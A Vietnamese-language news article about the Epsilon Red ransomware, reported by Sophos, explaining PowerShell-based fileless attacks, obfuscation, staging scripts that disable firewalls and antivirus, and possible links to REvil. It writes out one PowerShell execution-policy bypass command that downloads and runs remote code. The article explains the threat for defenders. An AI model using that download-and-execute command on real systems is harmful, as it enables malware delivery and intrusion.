Một mối đe dọa ransomware mới, được gọi là Epsilon Red, nhắm vào các Server dựa trên Microsoft chưa được vá trong các trung tâm dữ liệu doanh nghiệp. Được đặt theo tên một nhân vật phản diện ít được biết đến trong truyện tranh Marvel, Epsilon Red gần đây đã được phát hiện bởi một công ty an ninh mạng có tên Sophos. Kể từ khi được phát hiện, ransomware đã tấn công hàng loạt tổ chức trên thế giới.
Xem nhanh
PowerShell là gì?
Theo Sophos , phần mềm độc hại này sử dụng sự kết hợp của lập trình Go và tập lệnh PowerShell để tấn công các mục tiêu. Các tính năng tập lệnh PowerShell của Epsilon Red cung cấp cho nó khả năng xâm phạm các máy chủ dựa trên Microsoft. PowerShell của Microsoft là một nền tảng lập trình trình bao dòng lệnh và kịch bản được xây dựng trên .NET Framework.
PowerShell cung cấp các tính năng như khả năng thực thi lệnh từ xa, quyền truy cập vào các API cốt lõi của Microsoft, v.v. Tất cả các tính năng này làm cho PowerShell hữu ích cho người quản trị hệ thống và người dùng để tự động hóa các tác vụ và quy trình quản lý hệ điều hành.
Tuy nhiên, PowerShell cũng có thể được sử dụng như một công cụ mạnh mẽ để tạo phần mềm độc hại. Khả năng truy cập các công cụ của Microsoft Windows Management Instrumentation (WMI) của tập lệnh khiến nó trở thành một lựa chọn hấp dẫn cho những kẻ tấn công. Giao diện Công cụ quản lý của Window cho phép các tập lệnh PowerShell được công nhận là đáng tin cậy vốn có đối với hệ thống của Microsoft. Sự tin tưởng vốn có này cho phép các tập lệnh PowerShell được sử dụng như một vỏ bọc hiệu quả cho ransomware không có bộ lọc.
Ransomware (phần mềm tống tiền)
Phần mềm tống tiền là một dạng phần mềm độc hại thực thi bằng cách cõng từ phần mềm hợp pháp. Phần mềm độc hại không có bộ lọc dựa trên PowerShell sử dụng khả năng của PowerShell để tải trực tiếp vào bộ nhớ của thiết bị. Tính năng này giúp bảo vệ phần mềm độc hại trong tập lệnh PowerShell khỏi bị phát hiện.
Trong một kịch bản điển hình, khi một tập lệnh thực thi, trước tiên nó phải được ghi vào đĩa của thiết bị. Điều này cho phép các giải pháp bảo mật điểm cuối phát hiện tập lệnh. Vì PowerShell bị loại trừ khỏi các quy trình thực thi tập lệnh tiêu chuẩn, nên nó có thể bỏ qua bảo mật điểm cuối. Ngoài ra, việc sử dụng tham số bỏ qua trong tập lệnh PowerShell cho phép kẻ tấn công phá bỏ các hạn chế của tập lệnh mạng.
Ví dụ về tham số bỏ qua PowerShell là:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))Như bạn có thể thấy, việc thiết kế các thông số bỏ qua PowerShell tương đối dễ dàng.
Đáp lại, Microsoft đã phát hành bản vá để giải quyết lỗ hổng thực thi phần mềm độc hại từ xa liên quan đến PowerShell. Tuy nhiên, các bản vá chỉ có hiệu quả khi chúng được sử dụng. Nhiều tổ chức đã nới lỏng các tiêu chuẩn vá lỗi khiến môi trường của họ bị phơi bày. Thiết kế của Epsilon Red là để tận dụng mức độ phơi sáng đó.
Tính hữu ích hai mặt của Epsilon Red
Vì Epsilon Red hiệu quả nhất với các máy chủ Microsoft chưa được vá lỗi, phần mềm độc hại có thể được sử dụng như một công cụ nhận dạng và ransomware. Việc Epsilon có thành công trong một môi trường giúp kẻ tấn công có cái nhìn sâu sắc hơn về khả năng bảo mật của mục tiêu hay không.
Nếu Epsilon thành công trong việc truy cập Máy chủ Microsoft Exchange, thì một tổ chức đã cho thấy rằng tổ chức đó không tuân thủ các phương pháp hay nhất về bảo mật vá lỗi phổ biến. Đối với kẻ tấn công, điều này có thể cho thấy sự dễ dàng mà phần còn lại của môi trường của mục tiêu có thể bị Epsilon xâm nhập.
Epsilon Red sử dụng kỹ thuật obfuscation để ẩn tải trọng của nó. Obfuscation làm cho mã không thể đọc được và được sử dụng trong phần mềm độc hại PowerShell để tránh khả năng đọc cao của tập lệnh PowerShell. Với tính năng làm xáo trộn, các lệnh ghép ngắn bí danh PowerShell được sử dụng để gây khó khăn cho phần mềm chống vi-rút trong việc xác định các tập lệnh độc hại trong nhật ký của PowerShell.
Tuy nhiên, các tập lệnh PowerShell bị xáo trộn vẫn có thể được xác định bằng mắt phải. Một dấu hiệu phổ biến của một cuộc tấn công PowerShell Script sắp xảy ra là việc tạo ra một đối tượng WebClient. Kẻ tấn công sẽ tạo Đối tượng WebClient trong mã PowerShell để thiết lập kết nối bên ngoài đến một URL từ xa có chứa mã độc hại.
Nếu một tổ chức có thể bị tấn công do quá trình vá dễ dàng, khả năng tổ chức đó có đủ bảo vệ an ninh có khả năng phát hiện các tập lệnh PowerShell bị xáo trộn sẽ giảm xuống. Ngược lại, nếu Epsilon Red không xâm nhập được vào máy chủ, điều này sẽ cho kẻ tấn công biết rằng mạng của mục tiêu có thể giải mã phần mềm độc hại PowerShell một cách nhanh chóng, làm cho cuộc tấn công trở nên kém giá trị hơn.
Sự xâm nhập mạng của Epsilon Red
Chức năng của Epsilon Red rất đơn giản. Phần mềm sử dụng một loạt các tập lệnh Powershell để xâm nhập vào các máy chủ. Các tập lệnh PowerShell này được đánh số từ 1.ps1 đến 12.ps1. Thiết kế của mỗi tập lệnh PowerShell là để chuẩn bị một máy chủ đích cho tải trọng cuối cùng.
Tất cả các tập lệnh PowerShell trong Epsilon Red đều có mục đích riêng. Một trong những tập lệnh PowerShell trong Epsilon Red được thiết kế để giải quyết các quy tắc tường lửa mạng của mục tiêu. Một phần mềm khác trong loạt bài này được thiết kế để gỡ cài đặt phần mềm chống vi-rút của mục tiêu.
Như bạn có thể đoán, các tập lệnh này hoạt động đồng bộ để đảm bảo rằng khi tải trọng được phân phối, mục tiêu sẽ không thể nhanh chóng dừng tiến trình của nó.
Ai đứng sau Epsilon Red?
Hiện vẫn chưa rõ danh tính của những kẻ tấn công sử dụng Epsilon Red. Tuy nhiên, một số manh mối cho thấy nguồn gốc của những kẻ tấn công. Manh mối đầu tiên là tên của phần mềm độc hại. Epsilon Red là một nhân vật phản diện X-Men với câu chuyện có nguồn gốc từ Nga.
Manh mối thứ hai nằm trong ghi chú đòi tiền chuộc file .txt mà mã để lại. Nó tương tự như ghi chú được để lại bởi một băng đảng ransomware được gọi là REvil. Tuy nhiên, sự giống nhau này không chỉ ra rằng những kẻ tấn công là thành viên của băng nhóm. REvil vận hành một hoạt động RaaS (Ransomware dưới dạng dịch vụ) trong đó các chi nhánh trả tiền cho REvil để truy cập vào phần mềm độc hại của nó.
